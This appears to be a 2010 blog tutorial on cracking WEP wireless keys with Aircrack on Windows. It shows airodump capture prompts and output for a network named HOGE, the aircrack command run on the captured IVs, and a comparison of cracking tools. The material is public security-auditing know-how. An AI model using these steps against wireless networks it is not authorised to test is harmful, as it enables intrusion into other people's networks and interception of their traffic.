crack

Tuesday, 11 May 2010

Wireless WEP crack

Aircrack is a set of tools for auditing wireless networks:
  • airodump: 802.11 packet capture program

  • aireplay: 802.11 packet injection program

  • aircrack: static WEP and WPA-PSK key cracker

  • airdecap: decrypts WEP/WPA capture files

    Wireless Card Installation

    1. Download Aircrack from http://100h.org/wlan/aircrack/
    2. Read the documentation (README.html) and follow it. It has the most comprehensive explanation.
    3. I have a CISCO Aironet 350 and a PrismGT card (Corega WLCB-54GT), but only the CISCO works fine on Windows. PrismGT does not work on Windows. The Aironet 350 works for 11b networks.

    How to capture (airodump)

    1. Search for WLANs. Enter 0 at the channel prompt to hop between all channels.
      > airodump.exe
               airodump 2.3 - (C) 2004,2005 Christophe Devine
      
        usage: airodump     [ivs only flag]
      
        Known network adapters:
      
        18  Cisco Systems 350 Series PCMCIA Wireless LAN Adapter
         2  Intel(R) PRO/100 VE Network Connection
         3  1394 Net Adapter
      
        Network interface index number  -> 18
      
        Interface types:  'o' = HermesI/Realtek
                          'a' = Aironet/Atheros
      
        Network interface type (o/a)  -> a
      
        Channel(s): 1 to 14, 0 = all  -> 0
      
        (note: if you specify the same output prefix, airodump will resume
         the capture session by appending data to the existing capture file)
      
        Output filename prefix        -> out
      
        (note: to save space and only store the captured WEP IVs, press y.
         The resulting capture file will only be useful for WEP cracking)
      
        Only write WEP IVs (y/n)      -> y
    2. From this screen, choose the channel of the network to capture.
      BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
      
       00:0D:0B:98:96:7F   48        2        0  11  54  WEP?  4B18E8C83ABD
       00:A0:B0:40:5C:84   87       13       16   1  54  WEP   HOGE
      
       BSSID              STATION            PWR  Packets  ESSID
      
       00:A0:B0:40:5C:84  00:04:23:52:80:41   86        4  HOGE
    3. Press Ctrl+C. Next, capture only channel 1 (ESSID HOGE) and store only the unique WEP IVs, which saves space.
      BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
      
       00:A0:B0:40:5C:84   87       36       48   1  54  WEP   HOGE
      
       BSSID              STATION            PWR  Packets  ESSID
      
       00:A0:B0:40:5C:84   00:04:23:52:80:41   87       38  HOGE

    How to crack (aircrack)

    1. Open a new console and type the following command. Aircrack re-reads the capture file as it grows, so you can run airodump and aircrack at the same time.
      # aircrack.exe -x -0 out.ivs
    2. 104-bit WEP needs about one million IVs. You may need a day or more to capture the packets. However, if you use aireplay from Aircrack on Linux to inject packets, you need only a few hours.
    3. This is the result. It needed only a quarter of a million. Aircrack can also run on Windows, but aireplay is not supported there.
    Note: In my experience, Aircrack is the best tool compared to the others. Aircrack on Linux supports packet injection, which means we can increase the traffic, so we need only a few hours to capture sufficient packets. Otherwise you will need several days.
    Here are my other reports.
    Tool             OS       CPU usage  Encryption  802.     NIC Support  Packet injection  My recommendation
    Airsnort (note)  Windows  High       WEP         11b?     Few          Not supported     Low
    Airsnort (note)  Linux    High       WEP         11b?     Few          Not supported     Low
    Aircrack         Windows  Low        WEP, WPA    11a/b/g  Many         Not supported     Mid
    Aircrack (note)  Linux    Low        WEP, WPA    11a/b/g  Many         Supported!        Recommended!
